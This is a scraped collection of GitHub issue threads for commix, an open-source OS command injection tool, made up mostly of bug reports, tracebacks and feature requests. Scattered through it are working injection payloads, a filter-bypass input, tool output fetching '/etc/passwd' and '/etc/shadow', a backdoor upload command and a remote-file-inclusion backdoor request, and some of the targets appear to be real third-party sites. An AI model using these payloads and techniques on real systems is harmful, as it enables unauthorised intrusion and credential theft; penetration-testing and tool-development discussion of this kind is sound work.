commixproject / commix Goto Github PK

So I'm trying to use this tool to make my workflow with this form easier. The program executes the GET parameters on the system and displays the output in line. For some reason commix won't pick up on it. Have I configured something wrong?

This may be a "DUH" but I am new.
Using the example command I get the following error

python commix.py --verbose --hostname --url=192.168.0.171 --auth-cred=admin: --data="ip=INJECT_HERE&submit=submit"

Traceback (most recent call last):
File "commix.py", line 322, in
main()
File "commix.py", line 297, in main
controller.do_check(url, filename)
File "/code/src/core/injections/controller/controller.py", line 131, in do_check
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
File "/code/src/core/injections/semiblind_based/techniques/file_based/fb_handler.py", line 469, in exploitation
if fb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
File "/code/src/core/injections/semiblind_based/techniques/file_based/fb_handler.py", line 103, in fb_injection_handler
if check_version[0] > "2.3":
IndexError: list index out of range

When I try to run the script, I run into this error.

> python commix.py
Traceback (most recent call last):
  File "commix.py", line 41, in <module>
    from src.utils import logs
  File "d:\commix\src\utils\logs.py", line 23, in <module>
    import readline
ImportError: No module named readline

Later I learnt readline is not supported in Windows.

> pip install readline
Collecting readline
  Downloading readline-6.2.4.1.tar.gz (2.3MB)
    100% |################################| 2.3MB 340kB/s
    Complete output from command python setup.py egg_info:
    error: this module is not meant to work on Windows

Hi there,

I manually identified a blind command injection and was trying to use Commix (current Kali version) to assist me during the exploitation. However, all my tries resulted in the following error:

[*] Checking connection to the target URL... [ FAILED ]

This is probably caused by the target URL being requested without its POST data. In such cases, it returns a 302 status and redirects back to the original form, which is on another page.

I guess Commix probably interprets this as an error or a not existing page. Is this a correct assumption? Could this be fixed in future updates, at least bypassing this first check?

Cheers!

Hi there,

I'm @7MinSec on Twitter and just shot you a couple tweets regarding how I might leverage a Burp-identified SQLi vuln. Oh, I'm also brand new(b) to Commix :-)

Burp identified a SQLi through Collaborator DNS/HTTP interaction, but I couldn't recreate this or get any further with SQLmap, so a friend said to give Commix a shot.

The basic command I'm running is:

commix.py -u http://url --data=page=blah&id=123 --cookie=ABUNCHOFSTUFF -p id

The classic injection technique fires up and gets somewhere between 0.2 and 1.3% done (on average) and then says:

[X] Critical: Name or service not known and then the app just hangs there indefinitely.

Can you help me figure out what the error is about exactly, and/or any tips for further exploring/exploiting what Burp has identified?

Brian

When prompted:
[?] Do you want a Pseudo-Terminal shell? [Y/n/q] >
[x] 'enter' is not a valid answer.

Enter should choose the capitalised value 'Y'.

Like SQLMap for SQLi, I think Commix is the de facto standard tool for Command Injection.
I am working on a project for automated mobile application security assessment called Mobile Security Framework (MobSF)
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF

So I have a module for Web API testing named the API Fuzzer that will fuzz and uncover security vulnerabilities in the web and backend APIs of mobile apps. I think it's always right to use/integrate existing tools that work great than to reinvent the wheel.

Mobile Security Framework's API Fuzzer can generate random URL / POST Body fuzz points and I think commix works on a single URL/ Body Fuzz field. If we combine the crawling and fuzzing capabilities of MobSF's API Fuzzer and the command injection detection and exploitation of Commix, I think it would become a great product for the community.

If this sounds good to you, All I need from you is an API for commix to which I can send URLs with fuzz point and this api returns an ID and later I can poll back to an API with this ID to see if commix detected a Command Injection. Let me know about your thoughts.

Hi, i try use with tor on win7, but has error:

File "\src\utils\requirments.py
", line 24, in do_check
null = open("/dev/null", "w")
IOError: [Errno 2] No such file or directory: '/dev/null'

Google told me fix:

import os
 null = open(os.devnull, "w")

After this;

Critical: HTTP Error 501: Tor is not an HTTP Proxy

But now Tor didn't use HTTP proxy, only socks5. Maybe.

Sorry, my english bad, first my post

HI
this error when use file based tich
Trying to create a file on /...
Traceback (most recent call last):
File "commix.py", line 324, in
main()
File "commix.py", line 299, in main
controller.do_check(url, filename)
File "/root/commix/src/core/injections/controller/controller.py", line 168, in do_check
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 482, in exploitation
if fb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 196, in fb_injection_handler
output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_injector.py", line 429, in injection_output
return output
UnboundLocalError: local variable 'output' referenced before assignment

Running version v1.5-dev#14

I get the following crash when pressing y to the Pseudo-Terminal (type '?' for available options) prompt:

$ ./commix.py --url="http://www.example.com/a.php?b=INJECT_HERE" --prefix="|" --suffix="%23" --os="U" --cookie="session=601d3965545ef...8dd6eaa82ba81d" 
                                       __           
   ___    ___     ___ ___     ___ ___ /\_\   __  _   
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v1.5-dev#14
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ http://commixproject.com
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[*] Checking connection to the target URL... [ SUCCEED ]
[+] A previously stored session has been held against that host.
[?] Do you want to resume to the classic injection point? [Y/n/q] > y
[+] The parameter 'adapter' seems injectable via (results-based) classic injection technique.
    [~] Payload: %3Becho ONNPSI$((38+31))$(echo ONNPSI)ONNPSI%2b%23

[?] Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > ?

  ---[ Available options ]---     
  Type '?' to get all the available options.
  Type 'back' to move back from the current context.
  Type 'quit' (or use <Ctrl-C>) to quit commix.
  Type 'reverse_tcp' to get a reverse TCP connection.
  Type 'bind_tcp' to set a bind TCP connection.
  
Traceback (most recent call last):
  File "./commix.py", line 766, in <module>
    main()
  File "./commix.py", line 716, in main
    controller.do_check(url, filename)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 396, in do_check
    if perform_checks(url,filename) == False:
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 381, in perform_checks
    get_request(url, http_request_method, filename, delay)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 273, in get_request
    injection_proccess(url, check_parameter, http_request_method, filename, delay)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 102, in injection_proccess
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
  File "/home/pentest/commix/src/core/injections/results_based/techniques/classic/cb_handler.py", line 436, in exploitation
    if cb_injection_handler(url, delay, filename, http_request_method) == False:
  File "/home/pentest/commix/src/core/injections/results_based/techniques/classic/cb_handler.py", line 364, in cb_injection_handler
    go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, delay, go_back_again)
TypeError: 'NoneType' object is not iterable

I got an issue after installing :
(*) Starting the installer... [ SUCCEED ]<br>
(*) Installing commix into the /usr/share/commix... [ SUCCEED ]</br>
(*) Installing commix to /usr/bin/commix... [ SUCCEED ]</br>
(!) The installation is finished! Type 'commix' to launch it.</br>
@:/opt$ commix
/usr/bin/commix: line 2: ./commix.py: No such file or directory

Fixed by changing /usr/share/commix/commix-master/commix.py in /user/bin/commix

commix-master is missing in the default pass.

Hey.
During the test, I received a positive response:

(!) The (GET) 'order id' parameter is vulnerable to Blind Command Injection. (+) Type: Blind Command Injection (+) Technique: Time-Based Injection Technique (+) Payload:; str = $ (echo CQHGXC); str1 = $ {# str}; if [6 -ne $ {str1}] ; then sleep 0; else sleep 1; fi
(?) Do you want a Pseudo-Terminal? [Y / n / q]> y

Added: --current-user --hostname --is-root --is-admin --sys-info --users --passwords --privileges

As it happened: commix --tor --url="http://www.blablabla.com/order.php?orderid=INJECT_HERE" --current-user --hostname --technique="time-based" --is-root --is-admin --sys-info --users --passwords --privileges

And most of the vulnerability can not find (a very long time to find). As already found a substitute option? (+) Payload:; str = $ (echo CQHGXC); str1 = $ {# str}; if [6 -ne $ {str1}]; then sleep 0; else sleep 1; fi
The results of the previous session are not saved? (example:SQLMAP)
When adding an option, the test begins again, that is not very convenient.
Sry, my bad eng.

hi all

i had proplom with shell in commix

this photo shows the error

https://s31.postimg.org/axixaoeiz/Screenshot_at_2016_07_16_14_40_29.png

how i fix it ?

thanks ...

https://ptl.io/web_for_pentester_i386.iso
has simple exercise for command injection: http://192.168.0.102/commandexec/example2.php?ip=127.0.0.1 (on my computer)
parameter ip protected with this regexp: preg_match('/^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$/m', $_GET['ip'])
it can be bypassed like that: ip=127.0.0.1%0Als

I have bad knowledges in pentesting and i don't know, whether I should write about it

Hi
this errro message when try to test

etting the (GET) 'trg' parameter for tests.
(*) Testing the classic injection technique... FAILED Testing the eval-based injection technique... FAILED Testing the time-based injection technique... SUCCEED The (GET) 'trg' parameter is vulnerable to Blind Command Injection.
(+) Type : Blind Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : & sleep 0 && str=$(echo FBXUKV) && str1=${#str} && [ 6 -eq ${str1} ] && sleep 1 //

() Fetching '/etc/passwd' to enumerate users entries...
() Retrieving the length of execution output... SUCCEED Retrieved 5 characters.
(*) Grabbing the output, please wait... 100.0% Identified 1 entries in '/etc/passwd'.
Traceback (most recent call last):
File "commix.py", line 329, in
main()
File "commix.py", line 304, in main
controller.do_check(url, filename)
File "/root/commix/src/core/injections/controller/controller.py", line 127, in do_check
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
File "/root/commix/src/core/injections/blind/techniques/time_based/tb_handler.py", line 356, in exploitation
if tb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
File "/root/commix/src/core/injections/blind/techniques/time_based/tb_handler.py", line 253, in tb_injection_handler
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
File "/root/commix/src/core/injections/blind/techniques/time_based/tb_enumeration.py", line 267, in do_check
system_users(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
File "/root/commix/src/core/injections/blind/techniques/time_based/tb_enumeration.py", line 180, in system_users
print " ("+str(count)+") '" + Style.BRIGHT + Style.UNDERLINE + fields[0]+ Style.RESET_ALL + "'" + Style.BRIGHT + is_privilleged + Style.RESET_ALL + "(uid=" + fields[1] + "). Home directory is in '" + Style.BRIGHT + fields[2]+ Style.RESET_ALL + "'."
IndexError: list index out of range

the best gearting on you

when i try to use commix.py to test website shell injection on kali sana it is get an error as in this lines

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
Traceback (most recent call last):
File "commix.py", line 313, in
main()
File "commix.py", line 207, in main
if response.info()['server'] :
File "/usr/lib/python2.7/rfc822.py", line 388, in getitem
return self.dict[name.lower()]
KeyError: 'server'

and I just use the --current-user with no other options
I need your help please

Hi

I have a question about license file, in the header of commix.py you have GPL-3.0+, in readme/COPYING I see in the first part GPL-3.0+ but full license text makes reference to AGPL-3.0 license, Do yo could clarify what is the correct license for commix?

Thank you very much!

Regards

Wild idea that just struck me while having a look at this project. It would be neat feature for it to digest Burp output files and use them as inputs for fuzzing to find bugs and exploit them :)

Just a thought, I believe SQLmap implemented this some time ago :)

Hi,

I have been came across exception in the Shellshock module python file,
the exception is happening in line number 736 "print "\n" + settings.print_critical_msg(err_msg)", when the err_msg variable does not referenced before :(

in order to mitigate it I just added a line before with assignment err_msg = ''
take it into your consideration in next release :)

Hi,
Great tool !
My suggestion would be the following, and its bluntly stolen from sqlmap, but would be useful in commix.
1. accept an HTTP request in a file as a baseline for testing, map all the parameters in the request so you could use a parameter selection option ( -p parameter1,parameter2,).
2. accept an HTTP request in a file as a baseline for testing, and use a wildcard locator in the request file to point to where testing should be done (in sqlmap you can use * to specify where to test, which give you alot of space in testing area).
3. an option for the tool to spider the site and look for parameters and test them automatically. (again, stolen from sqlmap --forms --crawl)

Thanks and keep up the great work.
Roy

Problem was solved. Sorry it's my mistake. I have to use parameter --url="" like this.

I'm using Kali linux. I'm trying to use commix on some discovered links, I faced this problem which described below:

___ ___ ___ ___ ___ ___ /_\ __ _
/'\ / __\ /' __ __\ /' __ __`/\ \ /\ /'\ v1.7-dev#4
/\ _//\ \L\ /\ /\ /\ /\ /\ /\ \ \ \/> </
\ _\ _/\ _\ _\ _\ _\ _\ _\ _/_/_\ http://commixproject.com
//// /////////////////_/ (@commixproject)

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[*] Checking connection to the target URL... [ SUCCEED ]
[!] Warning: Heuristics have failed to identify target server.
[!] Warning: Heuristics have failed to identify server's operating system.
[?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U
-bash: U: command not found

[9]+ Stopped ./commix.py -u ...............................................................

OR --- Something like this:

Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[] Checking connection to the target URL... [ SUCCEED ]
[] Setting the POST parameter 'gonder' for tests.
[!] Warning: Due to the relatively slow response of 'cmd.exe' in target host, there may be delays during the data extraction procedure.
[] Testing the classic injection technique... [ FAILED ]
[] Testing the eval-based code injection technique... [ FAILED ]
[] Testing the time-based injection technique... [ FAILED ]
[] Trying to create a file in '\inetpub\wwwroot.....'...
[!] Warning: It seems that you don't have permissions to read and/or write files in '\inetpub\wwwroot....'.
[?] Do you want to try the temporary directory (C:\Windows\TEMP) [Y/n/q] > y
-bash: y: command not found

[3]+ Stopped commix -u ......................................................

Hello,

Here is the issue that I've shared my ideas at the end of your BHEU presentation. It was awesome session, nice to meet you at there 👍 btw.

Most modern web application are using command execution with & sign that means execution will be running as a background job. Thus, there will NOT be output, as well as time difference between request-response. Which means commix is not capable to detect those cases.

For example;

Image processing is really time consuming jobs to do. Imagine that every single image processing takes 50 second, we can not expect that users to wait till the job done!!!

Following execution will convert image. Basically we can fire up that command then wen can immediately show "Your task will be end in a minutes. We will notify you" information message.

Vulnerable code:

shell_exec("php processimage.php someimage.jpeg ".$_GET['cmd']." > /dev/null &")

This code is still vulnerable against command injection. It's kind a blind type of vulnerability but time delay payloads won't work. Therefor I'm gonna call that as Double blind injection.

I've 3-4 ways to mitigate this issue on manual penetration test, which can be producible for automation as well, but let starts your thoughts first guys.

Hi there,

Have a Windows Server with IIS 8.0 running.

Did a test against a application hosted on and I used the following CLI:

"python commix.py --url="https://target/1.aspx?param=INJECT_HERE" --level=3"

Thus, I got a possible command injection per received message:
"
(*) Testing the file-based injection technique... SUCCEED The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
(+) Type : Semiblind Command Injection
(+) Technique : File-Based Injection Technique
(+) Payload : powershell.exe -InputFormat none Add-Content LMCVOT.txt LMCVOT
"
Going head, Commix offered me to open an os_shell which had the following options:

"(?) Do you want a Pseudo-Terminal? [Y/n/q] > Y"

It opened a "commix(os_shell) >" console and I was quite impressed. However, I have tried couple of windows commands like ipconfig / dir, etc. Nothing worked. Even powershell equivalents but with the same negative result.

Then I issued a help command to check out my options:

"
Type '?' to get all the available options.
Type 'set' to set a context-specific variable to a value.
Type 'back' to move back from the current context.
Type 'quit' (or use ) to quit commix.
Type 'os_shell' to get into an operating system command shell.
Type 'reverse_tcp' to get a reverse TCP connection.
"

Typed reverse_tcp but there is no help for available for this option as which parameters I do have to use or similar details. Bottom line, please, can you document this option a little more or at least gi'me some clues of how it has supposed to work.

On the other hand I did another test using the following cli:

python commix.py --url="https://site/param=INJECT_HERE" --level=3 --file-write="/home/commix/backdoor.ps1" --file-dest="\inetpub\wwwroot\app\app00\backdoor.ps1"

The odd thing is commix apparently doesn't care about my custom payload. It used the same default txt payload.

At the end of this particular test it said the same thing:
"
(*) Testing the file-based injection technique... SUCCEED The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
(+) Type : Semiblind Command Injection
(+) Technique : File-Based Injection Technique
(+) Payload : powershell.exe -InputFormat none Add-Content AQLNMS.txt AQLNMS
"

Please advice.

Cheers.

Hi,
please Tag (https://github.com/stasinopoulos/commix/tags) the last version of source.

I'm preparing the .deb for BackBox!

Thanks

Hi,

I found a issue when I input a json-formated payload like this:

python commix.py -u http://xxxx --data '{"dir" :{"path": "."}}'

when there exists whitespace before ":", commix will not work correctly.

commix/src/core/requests/parameters.py: 225

value = re.findall(r'\:\"(.*)\"', parameter)

the regular expression here would get nothing if there exists whitespace

I think, it should be

value = re.findall(r'\:\s*\"(.*)\"', parameter)

any plans to use CVE-2016-6662 and CVE-2016-6663 for privilege escalation

Hi, i've been having this issue alot whereby i'd get a series of errors, ending with 'Index out of range", notably when creating a file. I've tried updating python and commix but no luck, unless i'm updating them wrong...? Would appreciate help, thanks

Hi,

Just checked out the latest code on 2 (VM) boxes - Kali (via Kali repo) and Ubuntu (via git clone). Running commix fails when on a local, private network, i.e. without access to Internet. Not sure if this is by design.?

Easy to reproduce: change the network adaptor to Host-Only networking, and try running commix. It fails with:

# commix
[x] Critical: Network is unreachable.

Get a traceback when I try to run commix ...

Traceback (most recent call last): File "commix.py", line 877, in <module> filename = logs_filename_creation() File "commix.py", line 108, in logs_filename_creation filename = logs.create_log_file(url, output_dir) File "/home/simon/commix/src/utils/logs.py", line 61, in create_log_file parts = url.split('//', 1) AttributeError: 'NoneType' object has no attribute 'split'

Make it read from a raw request file similar to sqlmap -r req.txt. This option can substitute the options:

    -u URL, --url=URL   Target URL.
    --data=DATA         Data string to be sent through POST.
    --host=HOST         HTTP Host header.
    --referer=REFERER   HTTP Referer header.
    --user-agent=AGENT  HTTP User-Agent header.
    --param-del=PDEL    Set character for splitting parameter values.
    --cookie=COOKIE     HTTP Cookie header.
    --cookie-del=CDEL   Set character for splitting cookie values.
    --headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
...

Firstly, thanks for sharing your code with the open-source world.

As you may or may not be aware, we have included your tool in our Kali Linux penetration testing distribution so it can be easily installed by our large user-base.

As the distribution includes hundreds of tools, keeping them updated is a significant undertaking. We would like to ensure that your tool is always kept as current as possible so that our users can benefit from the latest features and fixes. You could help us in this task immensely by tagging your releases here on GitHub. Tagging releases allows us to automate the process of checking for new releases, ensuring that tools get updated far more quickly.

Tagging can be included in your workflow very easily and would go a long way to helping us keep your tool updated in our distribution. The most common type of tag is the "lightweight" version as follows (where 0.3 is the new version number):

git-tag v0.3
git push --tags

Thanks!

C:\Python27\commix-master\commix-master>commix.py --url="http://windows2003-sp0:8081/dilemma/CI/PHP/System-VisibleExec-OpenCommand-NoAmpersand/default2.php?param=1"
__
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __ __\ /' __ `/\ \ /\ /'
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// ////////////////// { v0.2b-NonGit }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... Traceback (most recent call last):
File "C:\Python27\commix-master\commix-master\commix.py", line 342, in
main()
File "C:\Python27\commix-master\commix-master\commix.py", line 206, in main
filename = logs.create_log_file(url, output_dir)
File "C:\Python27\commix-master\commix-master\src\utils\logs.py", line 43, in create_log_file
os.mkdir(output_dir + host + "/")
WindowsError: [Error 267] The directory name is invalid: '.output/windows2003-sp0:8081/'

There is a problem with parsing newlines in the pseudo shell. Consider these outputs:

commix(os_shell) > ls

index.php license.txt readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php

kali:~# curl 'http://10.11.1.234/?p=1&cmd=ls'
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
xmlrpc.php

Tested on commix versions v1.5-dev#4 and v1.3 in several Linux injections.

Hi why commix canot do injection realy on website it is give me command could not return any output, due to pipe (|) filtration on target.
this is mean that it is weak agnis filtration

When I scan a HTTPS based website, I get a traceback error:

[*] Checking connection to the target URL... Traceback (most recent call last):
File "./commix.py", line 771, in
main()
File "./commix.py", line 269, in main
headers.check_http_traffic(request)
File "/usr/share/commix/src/core/requests/headers.py", line 112, in check_http_traffic
http_response(response.info())
AttributeError: 'NoneType' object has no attribute 'info'

I tried v1.5-stable and the latest build v1.6-dev#5
OS = Kali 2016.2
adding --force-ssl doesn't seem to help...

Is it something I'm doing wrong?

Kudos for this nice project BTW!

Hi
thank for all work here
when i update commix this day this error happen :

+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : %26 sleep 0 %26%26 str=$(echo FDQWMO) %26%26 str1=${#str} %26%26 [ 6 -eq ${str1} ] %26%26 sleep 5 %27

() Fetching '/etc/shadow' to enumerate users password hashes...
() Retrieving the length of execution output... SUCCEED Retrieved 5 characters.
() Grabbing the output, please wait... 100.0% Identified 3 entries in '/etc/shadow'.
Traceback (most recent call last):
File "commix.py", line 324, in
main()
File "commix.py", line 299, in main
controller.do_check(url, filename)
File "/root/commix/src/core/injections/controller/controller.py", line 158, in do_check
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_handler.py", line 356, in exploitation
if tb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_handler.py", line 253, in tb_injection_handler
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_enumeration.py", line 262, in do_check
system_passwords(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_enumeration.py", line 215, in system_passwords
if fields[1] != "" and fields[1] != "!" and fields[1] != "":
IndexError: list index out of range

Hi!

I am working to include commix in Debian, However, commix write logfile in the path where is launched, for this reason, I created this patch to make that commix write logfile in proper path (Home directory).

02_write_log_in_home.diff

Thanks :)

I try the example from https://www.youtube.com/watch?v=A57pbJA706U and the reverse_tcp is not working. Next I try to connect the reverse_tcp from metasploit using telnet from shell it can connect just for a while.

But it strange when I try to take out the PHP reverse_tcp code from ./commix/src/core/shells/reverse_tcp.py into their own file let say rev_tcp.php then I try again the reverse_tcp is working.

Hi!

When i start the commix with the following:

commix --url="http://192.168.1.81/dvwa/vulnerabilities/exec/" --data="ip=INJECT_HERE&submit=submit" --cookie="security=low; PHPSESSID=2a6cbc4696fc66a74670d663d7cc77f9"

I got the pseudo-terminal shell but, when i call the option "reverse_tcp" it just show "reverse_tcp" on the command line, where is the reverse_tcp_lport option? When i call the options (the ? option) i cant see anything about this. Any documentation about this will be welcome.

Thanks.

Hey,

When I tried to execute the script to check for Shellshock vulnerability I came across the above mentioned issue.
Add the fix to your next push :)

After the latest update i am having problems employing the shellshock technique for command injection. I haven't tested any other techniques as of yet since i was working on this particular host.

commix.py --proxy=62.197.227.163:80 --shellshock --verbose --url=http://vulnhost.com/cgi-bin/wspd_cgi.sh/streamfile.p?Serial=03061&Seq=5

Returns the following error.

Traceback (most recent call last):
  File "C:\PentestBox\bin\WebApplications\commix\commix.py", line 403, in <module>
    main()
  File "C:\PentestBox\bin\WebApplications\commix\commix.py", line 247, in main
    print Style.BRIGHT + "(!) The server's operating system was identified as " + Style.UNDERLINE + identified_os  + Style.RESET_ALL + "." + Style.RESET_ALL
UnboundLocalError: local variable 'identified_os' referenced before assignment
Seq: invalid floating point argument: =1

I tried it on another host i had identified as vulnerable to shellshock and the same thing happened. I'd appreciate any help, thanks in advance.

python commix.py --url=https://www.artsy.net/search?q=INJECT_HERE --technique=Time-Based

(*) Setting the (GET) 'q' parameter for tests.
(*) Testing the time-based injection technique... [ SUCCEED ]
(!) The (GET) 'q' parameter is vulnerable to Blind-based Command Injection.
  (+) Type : Blind-based Command Injection
  (+) Technique : Time-Based Injection Technique
  (+) Payload : '| [ 6 -ne $(echo RYBYWL | tr -d '\n' | wc -c) ] || sleep 1
#

Confirmed with @stasinopoulos that this is a false positive.

Hi, first of all: fantastic tool,
I was using DVWA with command injection and is working as is should, but then i try to use Remote File inclusion and inject a backdoor via PHP code.

So the normal request via Browser that is working is: http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.8:81/stas.php?&addr=ls

But via commix the request is:
./commix.py --url "http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.8:81/stas.php?&addr=INJECT_HERE" --cookie="security=low; security_level=0; PHPSESSID=pkkj1956mfvuc8gooqaadqh3k3; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"

Commix is strarting all test but unfortunatly is found it as an exploitable request.

By using a proxy I saw that commix is replacing all the string from the first "=" "http://10.0.2.8:81/stas.php?&addr=INJECT_HERE" and not just at the INJECT_HERE from teh second "="

from burp: GET /dvwa/vulnerabilities/fi/?page=echo%20PCCYJW$((30%2B37))$(echo%20PCCYJW)PCCYJW HTTP/1.1

Somehow can i change this behaivour or is this a bug?

thanks
-Tili

Add support for: http://seclists.org/fulldisclosure/2016/Nov/67

Hi, I like your tool a lot, but I have a problem.

here is a simplified version of what I want to do:

commix -u http://10.0.0.1/index.pl?INJECT_HERE --data=$POST_DATA

I want to inject into the URL (yes directly after the '?' there is no parameter name), but commix sees it's a POST request and happily starts to inject POST parameters, completely ignoring the INJECT_HERE tag in the URL. Even with a parameter name and the '-p' option it only looks for the parameter in the post data.
ONLY POST PARAMETERS ARE TESTED.

Is there currently a way how to do this? If not, I really think this should be possible to do with commix without having to write a http proxy that adds the post data afterwards...

Also I miss the possibility to skip parameters/tests during tests or please tell me if this is possible.

using version 1.3.16 as delivered in Kali Linux.

Cheers

Hi
commix not support to exploit shell injection bypass Error: HTTP Error 403: Forbidden and i know that its can be exploited just with some codes
so if its add to commix its will be more usefully for pentest

Hi there it's a great tool you built there !
I would have 2 suggestions/issues:

• parsing JSON parameters like in SQLmap -> it detects if the body is JSON via the Header application/json then extract all the parameters in the JSON data
• is the proxy option working fine ? I tried to used it with burp suite to authenticate against an original webapp and even though it said "" Testing proxy 127.0.0.1:8080... [ SUCCEED ] "" I didn't see any trafic in my HTTP history in burp suite.
  

this is a test perform in government bug bounty website..for the upcoming cms(newly develop).following ZAP scan it find remote OS command injection and i used this commix its not vulnerable to other technique except file-based and time-based.But there a problem after gaining shell..this is what it show:
commix --url="http://vul url.in/search?term=INJECT_HERE" --technique=f --random-agent --hostname
__
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __ __\ /' __ `/\ \ /\ /'\
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// ////////////////// { v0.1b-01d4134 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

() Checking connection to the target URL... SUCCEED Testing the file-based semiblind injection technique...
() Trying to upload the 'TSMRYE.txt' on /var/www/... 2% Error: It seems that you don't have permissions to write on /var/www/.
(?) Do you want to try the temporary directory (/tmp/) [Y/n] > y
() Trying to upload file, on temporary directory (/tmp/)...
(!) The estimated response time is 1 second.
() Testing the tempfile-based injection technique... SUCCEED The (GET) 'term' parameter is vulnerable to Semiblind-based Command Injection.
(+) Type : Semiblind-based Command Injection
(+) Technique : Tempfile-Based Injection Technique
(+) Payload : ; str=$(echo FSVTZZ > /tmp/FSVTZZ.txt); str=$(cat /tmp/FSVTZZ.txt); str1=${#str}; if [ 5 -ne ${str1} ]; then sleep 0; else sleep 2; fi

() Retrieving the length of execution output... SUCCEED Retrieved 12 characters.
() Grabbing the output from '/tmp/FSVTZZ.txt', please wait... [ 100% ]

(!) The hostname is %- !$8&S,+/.

(?) Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type 'q' or use to quit)
Shell > uname

() Retrieving the length of execution output... SUCCEED Retrieved 11 characters.
() Grabbing the output from '/tmp/FSVTZZ.txt', please wait... [ 100% ]

!?$4+G62 !/

(*) Finished in 00:04:24.

show what will be the problem exactly????the output it retrieve is not good